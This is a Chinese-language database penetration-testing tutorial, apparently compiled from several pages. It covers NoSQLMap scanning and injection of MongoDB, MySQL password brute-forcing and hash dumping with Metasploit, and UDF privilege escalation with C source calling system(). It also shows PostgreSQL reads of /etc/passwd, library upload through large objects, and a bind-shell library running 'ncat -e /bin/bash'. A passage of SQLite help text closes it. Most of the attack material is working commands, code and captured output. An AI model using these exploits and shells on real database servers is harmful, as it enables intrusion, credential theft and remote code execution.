NoSQLMap有一个扫描器，可以扫描整个子网上的MongoDB访问。
我们可以直接输入整一个子网网段进行扫描，例如192.168.152.0/24。

我们回到主界面，选择选项4，

它将显示以下选项。

• 可以通过命令输入ip地址
• 可以从一个文件加载IP地址
• 启用/禁用ping之前，尝试与目标服务器的MongoDB连接。

首先，我们提供一个IP地址并观察结果。

正如我们在上面的结果中看到的，NoSQLMap已经扫描了提供的IP，并确认远程机器上有默认访问。
此外，它还提供了一个选项来将结果保存到CSV文件，我这里把CSV文件命名为test。
我们可以直接使用cat命令查看文件的内容。

我们还可以提供一个网段来进行扫描。

NoSQLMap正在检查我们提供网段的每台机器MongoDB匿名访问是否能成功。

成功获取到这台机器存在匿名访问，其他步骤跟以上相同，在此直接跳过。

4.4 使用NoSQLmap进行NoSQL注入

到目前为止，我们已经看到了使用NoSQLMap工具评估MongoDB服务器安全性的各种方法。

现在，让我们检查一下之前搭建好的实验环境(利用MongoDB作为后端Web应用程序中的漏洞)。

我们选择选项3 WEB应用程序攻击，这里会提示我们没有设置options。我们直接选择1，根据自己的实验情况设置即可。

退出主界面，选择3开始WEB应用程序攻击

选择随机数的长度及填充格式，我这里选择1，字母数字。一旦完成，NoSQLMap会提示我们选择要测试的参数。 在我们的例子中，第一个参数是处理MongoDB的动态参数。

我们看到这里可能存在注入，因此我们选择不开始时间盲注。

我们看到NoSQLMap已经完成了对应用程序中的注入漏洞的测试，并显示了所有注入点和使用的有效载荷的输出。在使用手动技术学习评估时，我们已经看到了这一点。

http://192.168.152.151:80/home.php?search[$ne]=OybrUiUGatApIIdOioUS&Search=Search
http://192.168.152.151:80/home.php?search[$gt]=&Search=Search

结论:
任何系统的安全性与其最薄弱的环节一样强大。 小小的错误配置会导致严重的损坏。 我们在这里展示的所有例子都是人们常犯的错误。请保持你的MongoDB是最新的，并且在把它传递给MongoDB之前总是验证用户的输入。

mysql

命令	描述
select @@version	显示mysql服务器版本
select version()	显示mysql服务器版本
SHOW STATUS	显示mysql服务器状态信息
show VARIABLES	显示所有的mysql服务器变量
select user()	查询当前数据库用户
SHOW VARIABLES LIKE '%datadir%'	显示包含数据字符串的所有变量
select load_file('/etc/passwd');	加载文件到数据库中
select 0xnnnnnn... INTO OUTFILE '/path/to/filename'	将数据写入文本文件.
select 0xnnnnnn... INTO DUMPFILE '/path/to/filename'	将数据写入二进制文件.

怎样安装mysql数据库服务器 ?

Lab: ubuntu / debian

$ sudo apt-get install mysql-server
$ sudo systemctl start service

编辑 /etc/mysql/mysql.conf.d/mysqld.cnf, 和改变 绑定的地址.

bind-address = 0.0.0.0

允许远程访问

root@sh:~# ss -ant | grep ":3306"
LISTEN     0      80           *:3306                     *:*
root@sh:~# mysql -h 10.0.250.71 -uroot -p
Enter password:
ERROR 1130 (HY000): Host '10.0.250.71' is not allowed to connect to this MySQL server

创建一个SQL文件 adduser.sql, 和执行这个命令: mysql -h 127.0.0.1 -u root -p mysql < adduser.sql

CREATE USER 'mysqlsec'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'mysqlsec'@'localhost' WITH GRANT OPTION;
CREATE USER 'mysqlsec'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'mysqlsec'@'%' WITH GRANT OPTION;

如果成功了，你就能够远程访问MYSQL数据库服务器.

root@sh:~# mysql -h 10.0.250.71 -u mysqlsec -p mysql
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.6.30-1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
mysql> select Host,User,Password from `mysql`.`user` where User='mysqlsec';
+-----------+----------+-------------------------------------------+
| Host      | User     | Password                                  |
+-----------+----------+-------------------------------------------+
| localhost | mysqlsec | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 |
| %         | mysqlsec | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 |
+-----------+----------+-------------------------------------------+
2 rows in set (0.00 sec)

怎样爆破mysql ?

msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE         /tmp/pass.txt    no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            10.0.250.71      yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port
   STOP_ON_SUCCESS   true             yes       Stop guessing when a credential works for a host
   THREADS           10               yes       The number of concurrent threads
   USERNAME          mysqlsec         no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > run

[*] 10.0.250.71:3306      - 10.0.250.71:3306 - Found remote MySQL version 5.6.30
[-] 10.0.250.71:3306      - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:AzVJmX (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES))
[-] 10.0.250.71:3306      - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:j1Uyj3 (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES))
[-] 10.0.250.71:3306      - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:root (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES))
[-] 10.0.250.71:3306      - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:mysql (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES))
[+] 10.0.250.71:3306      - MYSQL - Success: 'mysqlsec:password'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

怎样把mysql哈希值dump出来 ?

msf auxiliary(mysql_hashdump) > show options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.0.250.71      yes       The target address range or CIDR identifier
   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  mysqlsec         no        The username to authenticate as

msf auxiliary(mysql_hashdump) > run

[+] 10.0.250.71:3306      - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306      - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306      - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306      - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306      - Saving HashString as Loot: debian-sys-maint:*8E970943FBFAA7CF6A11A55677E8050B725D9919
[+] 10.0.250.71:3306      - Saving HashString as Loot: phpmyadmin:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306      - Saving HashString as Loot: freepbxuser:*433D16EECA646A6CCF8F024AD8CDDC070C6791C1
[+] 10.0.250.71:3306      - Saving HashString as Loot: mysqlsec:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306      - Saving HashString as Loot: mysqlsec:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

UDF权限提升

#include 
#include 

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
    unsigned int        arg_count;  // number of arguments
    enum Item_result    *arg_type;  // pointer to item_result
    char            **args;     // pointer to arguments
    unsigned long       *lengths;   // length of string args
    char            *maybe_null;    // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
    char            maybe_null; // 1 if func can return NULL
    unsigned int        decimals;   // for real functions
    unsigned long       max_length; // for string functions
    char            *ptr;       // free ptr for func data
    char            const_item; // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    if (args->arg_count != 1)
        return(0);

    system(args->args[0]);

    return(0);
}

char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
    return(0);
}

$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

将上面的代码编译成一个这样的库文件。接下来，请转换为一个十六进制字符串:

#!/usr/bin/python
# -*- coding: utf8 -*-

# https://www.exploit-db.com/exploits/1518/

# How to upload UDF DLL into mysql server ?
# show VARIABLES;
# select @@plugin_dir;
# SELECT CHAR (...) INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so'
# SELECT 0xnnnnn INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so'
# drop function if exists do_system
# create function do_system returns integer soname 'lib_mysqludf_sys.so';
# select sys_exec('id');

# How to Compile UDF Dll ?
# gcc -g -c raptor_udf2.c
# gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

import sys
import binascii


def convert(filename):
    with open(filename) as f:
        print(binascii.hexlify(f.read()))


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("python {} /path/to/lib_mysqludf_sys.so".format(sys.argv[0]))
    else:
        convert(sys.argv[1])

上传该文件, 并用mysql用户定义一个函数 do_system.

mysql > select @@plugin_dir;
mysql > SELECT 0x7f45........0000 INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so'
mysql > drop function if exists do_system
mysql > create function do_system returns integer soname 'lib_mysqludf_sys.so';
mysql > select do_system('id > /tmp/result.log');
mysql > select load_file('/tmp/result.log');

MOF权限提升

如果mysql部署在windows上，可以尝试用msf:

msf >
use exploit/windows/mysql/mysql_mof
use exploit/windows/mysql/mysql_start_up
use exploit/windows/mysql/scrutinizer_upload_exec
use exploit/windows/mysql/mysql_payload
use exploit/windows/mysql/mysql_yassl_hello

如果有足够的权限，还可以将数据写入os文件（启动，cron等）。

参考链接

1. http://www.mysqltutorial.org/mysql-cheat-sheet.aspx
2. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
3. https://www.rapid7.com/db/modules/exploit/windows/mysql/mysql_mof
4. http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html

postgresql

数据库连接

请连接到postgresql数据库,

lab:~/ $ psql -h 127.0.0.1 -U postgres -W

---

数据库命令

postgres=# help
You are using psql, the command-line interface to PostgreSQL.
Type:  \copyright for distribution terms
       \h for help with SQL commands
       \? for help with psql commands
       \g or terminate with semicolon to execute query
       \q to quit

postgres=# \h
Available help:
  ABORT                            CREATE FOREIGN DATA WRAPPER      DROP SEQUENCE
  ALTER AGGREGATE                  CREATE FOREIGN TABLE             DROP SERVER
  ALTER COLLATION                  CREATE FUNCTION                  DROP TABLE
  ALTER CONVERSION                 CREATE GROUP                     DROP TABLESPACE
  ALTER DATABASE                   CREATE INDEX                     DROP TEXT SEARCH CONFIGURATION
  ALTER DEFAULT PRIVILEGES         CREATE LANGUAGE                  DROP TEXT SEARCH DICTIONARY
  ALTER DOMAIN                     CREATE MATERIALIZED VIEW         DROP TEXT SEARCH PARSER
  ALTER EVENT TRIGGER              CREATE OPERATOR                  DROP TEXT SEARCH TEMPLATE
  ALTER EXTENSION                  CREATE OPERATOR CLASS            DROP TRIGGER
  ALTER FOREIGN DATA WRAPPER       CREATE OPERATOR FAMILY           DROP TYPE
  ALTER FOREIGN TABLE              CREATE ROLE                      DROP USER
  ALTER FUNCTION                   CREATE RULE                      DROP USER MAPPING
  ALTER GROUP                      CREATE SCHEMA                    DROP VIEW
  ALTER INDEX                      CREATE SEQUENCE                  END
  ALTER LANGUAGE                   CREATE SERVER                    EXECUTE
  ALTER LARGE OBJECT               CREATE TABLE                     EXPLAIN
  ALTER MATERIALIZED VIEW          CREATE TABLE AS                  FETCH
  ALTER OPERATOR                   CREATE TABLESPACE                GRANT
  ALTER OPERATOR CLASS             CREATE TEXT SEARCH CONFIGURATION INSERT
  ALTER OPERATOR FAMILY            CREATE TEXT SEARCH DICTIONARY    LISTEN
  ALTER ROLE                       CREATE TEXT SEARCH PARSER        LOAD
  ALTER RULE                       CREATE TEXT SEARCH TEMPLATE      LOCK
  ALTER SCHEMA                     CREATE TRIGGER                   MOVE
  ALTER SEQUENCE                   CREATE TYPE                      NOTIFY
  ALTER SERVER                     CREATE USER                      PREPARE
  ALTER SYSTEM                     CREATE USER MAPPING              PREPARE TRANSACTION
  ALTER TABLE                      CREATE VIEW                      REASSIGN OWNED
  ALTER TABLESPACE                 DEALLOCATE                       REFRESH MATERIALIZED VIEW
  ALTER TEXT SEARCH CONFIGURATION  DECLARE                          REINDEX
  ALTER TEXT SEARCH DICTIONARY     DELETE                           RELEASE SAVEPOINT
  ALTER TEXT SEARCH PARSER         DISCARD                          RESET
  ALTER TEXT SEARCH TEMPLATE       DO                               REVOKE
  ALTER TRIGGER                    DROP AGGREGATE                   ROLLBACK
  ALTER TYPE                       DROP CAST                        ROLLBACK PREPARED
  ALTER USER                       DROP COLLATION                   ROLLBACK TO SAVEPOINT
  ALTER USER MAPPING               DROP CONVERSION                  SAVEPOINT
  ALTER VIEW                       DROP DATABASE                    SECURITY LABEL
  ANALYZE                          DROP DOMAIN                      SELECT
  BEGIN                            DROP EVENT TRIGGER               SELECT INTO
  CHECKPOINT                       DROP EXTENSION                   SET
  CLOSE                            DROP FOREIGN DATA WRAPPER        SET CONSTRAINTS
  CLUSTER                          DROP FOREIGN TABLE               SET ROLE
  COMMENT                          DROP FUNCTION                    SET SESSION AUTHORIZATION
  COMMIT                           DROP GROUP                       SET TRANSACTION
  COMMIT PREPARED                  DROP INDEX                       SHOW
  COPY                             DROP LANGUAGE                    START TRANSACTION
  CREATE AGGREGATE                 DROP MATERIALIZED VIEW           TABLE
  CREATE CAST                      DROP OPERATOR                    TRUNCATE
  CREATE COLLATION                 DROP OPERATOR CLASS              UNLISTEN
  CREATE CONVERSION                DROP OPERATOR FAMILY             UPDATE
  CREATE DATABASE                  DROP OWNED                       VACUUM
  CREATE DOMAIN                    DROP ROLE                        VALUES
  CREATE EVENT TRIGGER             DROP RULE                        WITH
  CREATE EXTENSION                 DROP SCHEMA

postgres=# \?
General
  \copyright             show PostgreSQL usage and distribution terms
  \g [FILE] or ;         execute query (and send results to file or |pipe)
  \gset [PREFIX]         execute query and store results in psql variables
  \h [NAME]              help on syntax of SQL commands, * for all commands
  \q                     quit psql
  \watch [SEC]           execute query every SEC seconds

Query Buffer
  \e [FILE] [LINE]       edit the query buffer (or file) with external editor
  \ef [FUNCNAME [LINE]]  edit function definition with external editor
  \p                     show the contents of the query buffer
  \r                     reset (clear) the query buffer
  \s [FILE]              display history or save it to file
  \w FILE                write query buffer to file

Input/Output
  \copy ...              perform SQL COPY with data stream to the client host
  \echo [STRING]         write string to standard output
  \i FILE                execute commands from file
  \ir FILE               as \i, but relative to location of current script
  \o [FILE]              send all query results to file or |pipe
  \qecho [STRING]        write string to query output stream (see \o)

Informational
  (options: S = show system objects, + = additional detail)
  \d[S+]                 list tables, views, and sequences
  \d[S+]  NAME           describe table, view, sequence, or index
  \da[S]  [PATTERN]      list aggregates
  \db[+]  [PATTERN]      list tablespaces
  \dc[S+] [PATTERN]      list conversions
  \dC[+]  [PATTERN]      list casts
  \dd[S]  [PATTERN]      show object descriptions not displayed elsewhere
  \ddp    [PATTERN]      list default privileges
  \dD[S+] [PATTERN]      list domains
  \det[+] [PATTERN]      list foreign tables
  \des[+] [PATTERN]      list foreign servers
  \deu[+] [PATTERN]      list user mappings
  \dew[+] [PATTERN]      list foreign-data wrappers
  \df[antw][S+] [PATRN]  list [only agg/normal/trigger/window] functions
  \dF[+]  [PATTERN]      list text search configurations
  \dFd[+] [PATTERN]      list text search dictionaries
  \dFp[+] [PATTERN]      list text search parsers
  \dFt[+] [PATTERN]      list text search templates
  \dg[+]  [PATTERN]      list roles
  \di[S+] [PATTERN]      list indexes
  \dl                    list large objects, same as \lo_list
  \dL[S+] [PATTERN]      list procedural languages
  \dm[S+] [PATTERN]      list materialized views
  \dn[S+] [PATTERN]      list schemas
  \do[S]  [PATTERN]      list operators
  \dO[S+] [PATTERN]      list collations
  \dp     [PATTERN]      list table, view, and sequence access privileges
  \drds [PATRN1 [PATRN2]] list per-database role settings
  \ds[S+] [PATTERN]      list sequences
  \dt[S+] [PATTERN]      list tables
  \dT[S+] [PATTERN]      list data types
  \du[+]  [PATTERN]      list roles
  \dv[S+] [PATTERN]      list views
  \dE[S+] [PATTERN]      list foreign tables
  \dx[+]  [PATTERN]      list extensions
  \dy     [PATTERN]      list event triggers
  \l[+]   [PATTERN]      list databases
  \sf[+] FUNCNAME        show a function's definition
  \z      [PATTERN]      same as \dp

Formatting
  \a                     toggle between unaligned and aligned output mode
  \C [STRING]            set table title, or unset if none
  \f [STRING]            show or set field separator for unaligned query output
  \H                     toggle HTML output mode (currently off)
  \pset [NAME [VALUE]]   set table output option
                         (NAME := {format|border|expanded|fieldsep|fieldsep_zero|footer|null|
                         numericlocale|recordsep|recordsep_zero|tuples_only|title|tableattr|pager})
  \t [on|off]            show only rows (currently off)
  \T [STRING]            set HTML  tag attributes, or unset if none
  \x [on|off|auto]       toggle expanded output (currently off)

Connection
  \c[onnect] {[DBNAME|- USER|- HOST|- PORT|-] | conninfo}
                         connect to new database (currently "postgres")
  \encoding [ENCODING]   show or set client encoding
  \password [USERNAME]   securely change the password for a user
  \conninfo              display information about current connection

Operating System
  \cd [DIR]              change the current working directory
  \setenv NAME [VALUE]   set or unset environment variable
  \timing [on|off]       toggle timing of commands (currently off)
  \! [COMMAND]           execute command in shell or start interactive shell

Variables
  \prompt [TEXT] NAME    prompt user to set internal variable
  \set [NAME [VALUE]]    set internal variable, or list all if no parameters
  \unset NAME            unset (delete) internal variable

Large Objects
  \lo_export LOBOID FILE
  \lo_import FILE [COMMENT]
  \lo_list
  \lo_unlink LOBOID      large object operations
列出数据库列表
postgres=# \l
                                  List of databases
   Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   
-----------+----------+----------+-------------+-------------+-----------------------
 msfdb     | msfuser  | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
 template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
(4 rows)
列出数据库用户列表
postgres=# \du
                             List of roles
 Role name |                   Attributes                   | Member of
-----------+------------------------------------------------+-----------
 msfuser   |                                                | {}
 postgres  | Superuser, Create role, Create DB, Replication | {}
Please try more details about postgresql database.
列出目录列表
postgres=# select pg_ls_dir('/etc');
ERROR:  absolute path not allowed
postgres=# select pg_ls_dir('./');
      pg_ls_dir       
----------------------
 postmaster.opts
 postmaster.pid
 pg_logical
 pg_clog
 postgresql.auto.conf
 pg_hba.conf
 cmd.so
 pg_multixact
 postgresql.conf
 pg_ident.conf
 global
 pg_stat_tmp
 PG_VERSION
 pg_dynshmem
 pg_twophase
 pg_xlog
 pg_notify
 pg_snapshots
 pg_tblspc
 pg_serial
 pg_stat
 base
 pg_subtrans
 pg_replslot
(24 rows)
文件读取
方法一
postgres=# select pg_read_file('postgresql.conf', 0, 200);
                pg_read_file                
--------------------------------------------
 # -----------------------------           +
 # PostgreSQL configuration file           +
 # -----------------------------           +
 #                                         +
 # This file consists of lines of the form:+
 #                                         +
 #   name = value                          +
 #                                         +
 # (The "=" is optional.)  Whitespace m
(1 row)
方法二
postgres=# drop table pwn;
ERROR:  table "pwn" does not exist
postgres=# CREATE TABLE pwn(t TEXT);
CREATE TABLE
postgres=# COPY pwn FROM '/etc/passwd';
COPY 27
postgres=# SELECT * FROM pwn limit 1 offset 0;
                t                
---------------------------------
 root:x:0:0:root:/root:/bin/bash
(1 row)

postgres=# SELECT * FROM pwn;
                                      t                                       
------------------------------------------------------------------------------
 root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/usr/bin/nologin
 daemon:x:2:2:daemon:/:/usr/bin/nologin
 mail:x:8:12:mail:/var/spool/mail:/usr/bin/nologin
 ftp:x:14:11:ftp:/srv/ftp:/usr/bin/nologin
 http:x:33:33:http:/srv/http:/usr/bin/nologin
 uuidd:x:68:68:uuidd:/:/usr/bin/nologin
 dbus:x:81:81:dbus:/:/usr/bin/nologin
 nobody:x:99:99:nobody:/:/usr/bin/nologin
 systemd-journal-gateway:x:191:191:systemd-journal-gateway:/:/usr/bin/nologin
 systemd-timesync:x:192:192:systemd-timesync:/:/usr/bin/nologin
 systemd-network:x:193:193:systemd-network:/:/usr/bin/nologin
 systemd-bus-proxy:x:194:194:systemd-bus-proxy:/:/usr/bin/nologin
 systemd-resolve:x:195:195:systemd-resolve:/:/usr/bin/nologin
 systemd-journal-remote:x:999:999:systemd Journal Remote:/:/sbin/nologin
 systemd-journal-upload:x:998:998:systemd Journal Upload:/:/sbin/nologin
 avahi:x:84:84:avahi:/:/bin/false
 polkitd:x:102:102:Policy Kit Daemon:/:/bin/false
 git:x:997:997:git daemon user:/:/bin/bash
 colord:x:124:124::/var/lib/colord:/bin/false
 postgres:x:88:88:PostgreSQL user:/var/lib/postgres:/bin/bash
 lab:x:1000:1000::/home/notfound:/bin/bash
 stunnel:x:16:16::/var/run/stunnel:/bin/false
 dnsmasq:x:996:996:dnsmasq daemon:/:/usr/bin/nologin
 mongodb:x:995:2::/var/lib/mongodb:/bin/bash
 mysql:x:89:89::/var/lib/mysql:/bin/false
 sslh:x:994:994::/:/sbin/nologin
(27 rows)

postgres=# DROP table pwn;
写入文件
postgres=# DROP TABLE pwn;
DROP TABLE
postgres=# CREATE TABLE pwn (t TEXT);
CREATE TABLE
postgres=# INSERT INTO pwn(t) VALUES ('');
INSERT 0 1
postgres=# SELECT * FROM pwn;
               t                
--------------------------------
 
(1 row)

postgres=# COPY pwn(t) TO '/tmp/cmd.php';
COPY 1
postgres=# DROP TABLE pwn;
DROP TABLE
UDF hack
编译源
lab: / $ git clone https://github.com/sqlmapproject/udfhack/
lab: / $ gcc lib_postgresqludf_sys.c -I`pg_config --includedir-server` -fPIC -shared -o udf64.so
lab: / $ gcc -Wall -I/usr/include/postgresql/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so
lab: / $ strip -sx lib_postgresqludf_sys.so
命令执行
把udf.so转换为十六进制字符串。
lab:~/ $ cat udf.so | hex
利用数据库特性上传udf.so。
postgres=# INSERT INTO pg_largeobject (loid, pageno, data) VALUES (19074, 0, decode('079c...', 'hex'));
INSERT 0 1


postgres=# SELECT lo_export(19074, 'cmd.so');
ERROR:  pg_largeobject entry for OID 19074, page 0 has invalid data field size 3213
postgres=# SELECT setting FROM pg_settings WHERE name='data_directory';
        setting         
------------------------
 /var/lib/postgres/data
(1 row)
Library类库太大了，我们需要把它分成几块，详情可以查看https://github.com/sqlmapproject/sqlmap/issues/1170.
postgres=# select * from pg_largeobject;
 loid | pageno | data
------+--------+------
(0 rows)

postgres=# SELECT setting FROM pg_settings WHERE name='data_directory';
        setting         
------------------------
 /var/lib/postgres/data
(1 row)

postgres=# SELECT lo_creat(-1);
 lo_creat
----------
    19075
(1 row)

postgres=# SELECT lo_create(11122);
 lo_create
-----------
     11122
(1 row)

postgres=# select * from pg_largeobject;
 loid | pageno | data
------+--------+------
(0 rows)

postgres=# INSERT INTO pg_largeobject VALUES (11122, 0, decode('079c...', 'hex'));
INSERT 0 1
postgres=# INSERT INTO pg_largeobject VALUES (11122, 1, decode('a28e...', 'hex'));
INSERT 0 1
postgres=# INSERT INTO pg_largeobject VALUES (11122, 2, decode('1265...', 'hex'));
INSERT 0 1
postgres=# INSERT INTO pg_largeobject VALUES (11122, 3, decode('c62e...', 'hex'));
INSERT 0 1
postgres=# SELECT lo_export(11122, '/tmp/cmd.so');
 lo_export
-----------
         1
(1 row)

postgres=# SELECT lo_unlink(11122);
 lo_unlink
-----------
         1
(1 row)
成功上传library类库, 然后创建postgresql函数.
postgres=# CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/udf64.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
CREATE FUNCTION
postgres=# CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/udf64.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
CREATE FUNCTION
用sys_exec执行命令, 然后什么也没有返回.
postgres=# SELECT sys_exec('id');
 sys_exec
----------
        0
(1 row)
执行命令后，清除函数。
postgres=# DROP FUNCTION sys_exec(text);
DROP FUNCTION
postgres=# DROP FUNCTION sys_eval(text);
DROP FUNCTION
绑定shell
// bind shell on port 4444
#include "postgres.h"
#include "fmgr.h"
#include 

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

text *exec()
{
    system("ncat -e /bin/bash -l -p 4444");
}
编译源码
lab:postgres_cmd/ $  vim nc.c
lab:postgres_cmd/ $  gcc nc.c -I`pg_config --includedir-server` -fPIC -shared -o nc.so
lab:postgres_cmd/ $  strip -sx nc.so
复制nc.so到postgresql的tmp目录, 或者你可以利用数据库特性上传so文件.
lab:postgres_cmd/ $  sudo cp nc.so /tmp/systemd-private-374c1bd49d5f425ca21cca8cc6d89de7-postgresql.service-SKrVjI/tmp/nc.so
为绑定shell创建执行函数，用客户端连接到目标.
postgres=# CREATE OR REPLACE FUNCTION exec() RETURNS text AS  '/tmp/nc.so', 'exec' LANGUAGE C STRICT;
CREATE FUNCTION
postgres=# SELECT exec();
server closed the connection unexpectedly
    This probably means the server terminated abnormally
    before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
METASPLOIT POSTGRESQL模块
use auxiliary/admin/postgres/postgres_readfile
use auxiliary/admin/postgres/postgres_sql
use auxiliary/scanner/postgres/postgres_dbname_flag_injection
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/postgres/postgres_version
use auxiliary/server/capture/postgresql
use exploit/linux/postgres/postgres_payload
use exploit/windows/postgres/postgres_payload
参考链接
https://github.com/sqlmapproject/udfhack/
https://github.com/sqlmapproject/sqlmap/issues/1170
http://zone.wooyun.org/content/4971
http://drops.wooyun.org/tips/6449
http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html
sqlite
sqlite_hacking
连接数据库
让我们开始在命令提示符下键入一个简单的sqlite3命令，它将为您提供SQLite命令提示符，您将在其中发出各种SQLite命令。
┌─[lab@core]─[~/share/pentestlab/Darknet]
└──╼ sqlite3 temp.db
SQLite version 3.8.10.2 2015-05-20 18:17:19
Enter ".help" for usage hints.
sqlite> .help
.backup ?DB? FILE      Backup DB (default "main") to FILE
.bail on|off           Stop after hitting an error.  Default OFF
.binary on|off         Turn binary output on or off.  Default OFF
.clone NEWDB           Clone data into NEWDB from the existing database
.databases             List names and files of attached databases
.dbinfo ?DB?           Show status information about the database
.dump ?TABLE? ...      Dump the database in an SQL text format
                         If TABLE specified, only dump tables matching
                         LIKE pattern TABLE.
.echo on|off           Turn command echo on or off
.eqp on|off            Enable or disable automatic EXPLAIN QUERY PLAN
.exit                  Exit this program
.explain ?on|off?      Turn output mode suitable for EXPLAIN on or off.
                         With no args, it turns EXPLAIN on.
.fullschema            Show schema and the content of sqlite_stat tables
.headers on|off        Turn display of headers on or off
.help                  Show this message
.import FILE TABLE     Import data from FILE into TABLE
.indexes ?TABLE?       Show names of all indexes
                         If TABLE specified, only show indexes for tables
                         matching LIKE pattern TABLE.
.limit ?LIMIT? ?VAL?   Display or change the value of an SQLITE_LIMIT
.load FILE ?ENTRY?     Load an extension library
.log FILE|off          Turn logging on or off.  FILE can be stderr/stdout
.mode MODE ?TABLE?     Set output mode where MODE is one of:
                         ascii    Columns/rows delimited by 0x1F and 0x1E
                         csv      Comma-separated values
                         column   Left-aligned columns.  (See .width)
                         html     HTML 
 code
                         insert   SQL insert statements for TABLE
                         line     One value per line
                         list     Values delimited by .separator strings
                         tabs     Tab-separated values
                         tcl      TCL list elements
.nullvalue STRING      Use STRING in place of NULL values
.once FILENAME         Output for the next SQL command only to FILENAME
.open ?FILENAME?       Close existing database and reopen FILENAME
.output ?FILENAME?     Send output to FILENAME or stdout
.print STRING...       Print literal STRING
.prompt MAIN CONTINUE  Replace the standard prompts
.quit                  Exit this program
.read FILENAME         Execute SQL in FILENAME
.restore ?DB? FILE     Restore content of DB (default "main") from FILE
.save FILE             Write in-memory database into FILE
.scanstats on|off      Turn sqlite3_stmt_scanstatus() metrics on or off
.schema ?TABLE?        Show the CREATE statements
                         If TABLE specified, only show tables matching
                         LIKE pattern TABLE.
.separator COL ?ROW?   Change the column separator and optionally the row
                         separator for both the output mode and .import
